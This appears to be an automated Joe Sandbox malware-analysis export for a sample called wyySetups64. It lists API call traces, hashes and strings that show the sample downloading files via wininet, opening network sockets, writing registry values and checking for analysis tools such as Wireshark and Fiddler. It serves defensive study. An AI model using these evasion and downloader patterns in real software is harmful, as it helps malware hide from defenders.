                                                                                                                                                                                                              • API String ID: 3970221696-33419044
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(wininet.dll), ref: 03377CC3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03377CD7
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 03377CF7
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetOpenUrlW), ref: 03377D16
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 03377D53
                                                                                                                                                                                                              • _memset.LIBCMT ref: 03377D7E
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 03377D8C
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 03377DDB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03377DF9
                                                                                                                                                                                                              • Sleep.KERNEL32(00000001), ref: 03377E01
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,InternetCloseHandle), ref: 03377E0D
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 03377E28
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$Library$FileFree$CloseCreateHandleLoadSleepWrite_memset
                                                                                                                                                                                                              • String ID: InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$MSIE 6.0$wininet.dll
                                                                                                                                                                                                              • API String ID: 1463273941-1099148085
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0337455A
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 0337457B
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337459B
                                                                                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 033745BD
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 033745D7
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 03374620
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 03374644
                                                                                                                                                                                                              • send.WS2_32(?,033949C0,00000010,00000000), ref: 03374668
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 03374686
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 03374691
                                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 0337469F
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 033746B3
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 033746BD
                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 033746F6
                                                                                                                                                                                                              • SetLastError.KERNEL32(000005B4), ref: 0337470A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337472B
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 03374743
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventExchangeInterlockedThread$CloseCurrentErrorLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1692523546-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$swprintf$_malloc
                                                                                                                                                                                                              • String ID: %s %s$onlyloadinmyself$plugmark
                                                                                                                                                                                                              • API String ID: 1873853019-591889663
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 03375CD3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
• Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: VisibleWindow
                                                                                                                                                                                                              • String ID: ApateDNS$Capsa$CurrPorts$Fiddler$Malwarebytes$Metascan$Port$Process$Sniff$TCPEye$TaskExplorer$Wireshark
                                                                                                                                                                                                              • API String ID: 1208467747-3439171801
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00BD455A
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD457B
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD459B
                                                                                                                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 00BD45BD
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00BD45D7
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00BD4620
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00BD4644
                                                                                                                                                                                                              • send.WS2_32(?,00BE7440,00000010,00000000), ref: 00BD4668
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00BD4686
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD4691
                                                                                                                                                                                                              • WSACloseEvent.WS2_32(?), ref: 00BD469F
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 00BD46B3
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 00BD46BD
                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000139F), ref: 00BD46F6
                                                                                                                                                                                                              • SetLastError.KERNEL32(000005B4), ref: 00BD470A
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BEFA44
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
• Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
• Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLast$CompareHandleSleepSwitchTimeclosesocketsendshutdowntime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3448239111-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000000D,?,?,?,?,?,?,0337A8C1,?,?), ref: 0337DA43
                                                                                                                                                                                                              • SetLastError.KERNEL32(000000C1,?,?,?,?,?,?,0337A8C1,?,?), ref: 0337DA62
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1452528299-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337C63D
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337C64C
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,00000000), ref: 0337C66F
                                                                                                                                                                                                                • Part of subcall function 0337C81E: RegCloseKey.ADVAPI32(80000000,0337C7FA), ref: 0337C82B
                                                                                                                                                                                                                • Part of subcall function 0337C81E: RegCloseKey.ADVAPI32(00000000), ref: 0337C834
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close_memset$Open
                                                                                                                                                                                                              • String ID: %08X
                                                                                                                                                                                                              • API String ID: 4292648718-3773563069
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 00BD3710
                                                                                                                                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 00BD3749
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 00BD3766
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 00BD3779
                                                                                                                                                                                                              • WSACreateEvent.WS2_32 ref: 00BD377B
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,00BED990), ref: 00BD378D
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,00BED990), ref: 00BD3799
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,00BED990), ref: 00BD37B8
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,00BED990), ref: 00BD37C4
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 00BD37D2
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 00BD37F8
                                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,?,00000030), ref: 00BD3816
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 00BD382B
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,00BED990), ref: 00BD383A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1455939504-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000002,00000011), ref: 03373710
                                                                                                                                                                                                              • WSAIoctl.WS2_32(00000000,9800000C,?,00000004,00000000,00000000,?,00000000,00000000), ref: 03373749
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,000000FB,?,00000004), ref: 03373766
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000004,?,00000004), ref: 03373779
                                                                                                                                                                                                              • WSACreateEvent.WS2_32 ref: 0337377B
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,033A1F0C), ref: 0337378D
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,033A1F0C), ref: 03373799
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,033A1F0C), ref: 033737B8
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,033A1F0C), ref: 033737C4
                                                                                                                                                                                                              • gethostbyname.WS2_32(00000000), ref: 033737D2
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 033737F8
                                                                                                                                                                                                              • WSAEventSelect.WS2_32(?,?,00000030), ref: 03373816
                                                                                                                                                                                                              • connect.WS2_32(?,?,00000010), ref: 0337382B
                                                                                                                                                                                                              • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,033A1F0C), ref: 0337383A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharEventMultiWidelstrlensetsockopt$CreateErrorIoctlLastSelectconnectgethostbynamehtonssocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1455939504-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,7AA29978), ref: 0337AA58
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 0337AA8F
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337AAA7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337AABA
                                                                                                                                                                                                                • Part of subcall function 03378020: lstrlenW.KERNEL32(?), ref: 03378038
                                                                                                                                                                                                                • Part of subcall function 03378020: _memset.LIBCMT ref: 03378042
                                                                                                                                                                                                                • Part of subcall function 03378020: lstrlenW.KERNEL32(?), ref: 0337804B
                                                                                                                                                                                                                • Part of subcall function 03378020: lstrlenW.KERNEL32(?), ref: 03378056
                                                                                                                                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0337ABBE
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?), ref: 0337AC6E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0337ACAA
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                                • Part of subcall function 03379730: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,7AA29978,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E,00000000), ref: 03379773
                                                                                                                                                                                                                • Part of subcall function 03379730: InitializeCriticalSectionAndSpinCount.KERNEL32(0337E1AE,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379812
                                                                                                                                                                                                                • Part of subcall function 03379730: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,0339125B,000000FF,?,0337E04E), ref: 03379850
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateEvent_memsetlstrlen$CloseCountCriticalHandleInitializeLocalSectionSleepSpinTime_mallocwsprintf
                                                                                                                                                                                                              • String ID: %4d.%2d.%2d-%2d:%2d:%2d$o1:$p1:$t1:
                                                                                                                                                                                                              • API String ID: 1254190970-1225219777
                                                                                                                                                                                                              • Opcode ID: ccea4f2daccc00ac2e6e5282f4a4633470c562c9f5e48f6508c2c11a760d9cad
                                                                                                                                                                                                              • Instruction ID: c3f39cec53927356e8c79222f374a199dc2cc4d1eef601c233714a3d02bb8412
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ccea4f2daccc00ac2e6e5282f4a4633470c562c9f5e48f6508c2c11a760d9cad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AC617EB1918344EBD770EF64C8C5AAFB3E9BB89714F004A1DF19987240E7399544CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 0337C889
                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?), ref: 0337C894
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337C8A4
                                                                                                                                                                                                              • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 0337C8C3
                                                                                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 0337C8D1
                                                                                                                                                                                                              • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0337C8E4
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 0337C8F2
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0337C900
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Close$Value$CreateDeleteOpenlstrlen
                                                                                                                                                                                                              • String ID: AppEvents$Network
                                                                                                                                                                                                              • API String ID: 3935456190-3733486940
                                                                                                                                                                                                              • Opcode ID: b11999438c5b1298fb57303903516c4de5a09890ad3ff0599b59a549531cb24d
                                                                                                                                                                                                              • Instruction ID: 6938de6e68c933cee0c75d1dcfe720b3c5fc9ea52591a3decb21e07d79602c63
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b11999438c5b1298fb57303903516c4de5a09890ad3ff0599b59a549531cb24d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A114F75A01208FBFB24EBA5DCC9FABB36CEB09711F10454AFA01D7240D676AE40D7A4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$swprintf$_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1873853019-0
                                                                                                                                                                                                              • Opcode ID: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                                                                                                              • Instruction ID: e095a36fdf76ff31fee0e724a3eebe3995ca676dede5d3e5ba81fee92a989b12
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 062e854903829bf1e59bc273fd803ecd21369289b7c01ee10e87d698f024efb4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9881D7B9940300AFE710EB54EC85F6B77A4EF48710F184164EE095F383EB71E955CAA6
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,6B68DABD), ref: 00BD5A65
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00BD5B04
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD5B42
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD5B67
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00BD5C5F
                                                                                                                                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00BD5C80
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD5B8C
                                                                                                                                                                                                                • Part of subcall function 00BD1280: __CxxThrowException@8.LIBCMT ref: 00BD1290
                                                                                                                                                                                                                • Part of subcall function 00BD1280: DeleteCriticalSection.KERNEL32(00000000,?,00BE7E78), ref: 00BD12A1
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,00000000), ref: 00BD5CF1
                                                                                                                                                                                                              • timeGetTime.WINMM ref: 00BD5CF7
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00BD5D0B
                                                                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BD5D14
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1400036169-0
                                                                                                                                                                                                              • Opcode ID: 3d36b6caafa3bfaf6cd96c2db17d9b1583bd00cfcf53a95359c628f82e75602b
                                                                                                                                                                                                              • Instruction ID: 03cce25f0b7aab9ac019dd8b6ac957d83a0c275407ec28b29924623c45235764
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3d36b6caafa3bfaf6cd96c2db17d9b1583bd00cfcf53a95359c628f82e75602b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0A1F4B0A01A46AFD354DF6AC88479AFBE8FF08304F50466EE12DD7640DB74A964CF90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,6B68DABD,?,?,?,?,00000000,000000FF,00000000), ref: 00BD4CC6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,6B68DABD,?,?,?,?,00000000,000000FF,00000000), ref: 00BD4CED
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 00BD4D01
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 00BD4D08
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2124651672-0
                                                                                                                                                                                                              • Opcode ID: a3215a787de27e52e7575dd88eabcc741d4b8529f7951e666b581872d30725dd
                                                                                                                                                                                                              • Instruction ID: 14a4ea2adc091c89e9ad1d13359ef2f20572f1980277e81012a17e4eebc8fe9a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3215a787de27e52e7575dd88eabcc741d4b8529f7951e666b581872d30725dd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4B51C076A04A449FC324DFA8D985B6AF7F5FF48710F00456EE50ADB741EB35A8008B91
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,7AA29978,?,?,?,?,00000000,000000FF,00000000), ref: 03374CE6
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,7AA29978,?,?,?,?,00000000,000000FF,00000000), ref: 03374D0D
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03374D21
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03374D28
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalErrorLastSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2124651672-0
                                                                                                                                                                                                              • Opcode ID: 5ff9096e333db1c975628ff7a1696bd99c5544661467a674580122c3a8f33f93
                                                                                                                                                                                                              • Instruction ID: e602834c44050d07b794edae4ab5afad60c048b1b04f4737402c538af618d29c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ff9096e333db1c975628ff7a1696bd99c5544661467a674580122c3a8f33f93
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB519E76A04709DFC724EFA9E8C4A6AB7F8FB48710F04496AE95AC7740D735A400CB51
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset$_wcsrchr
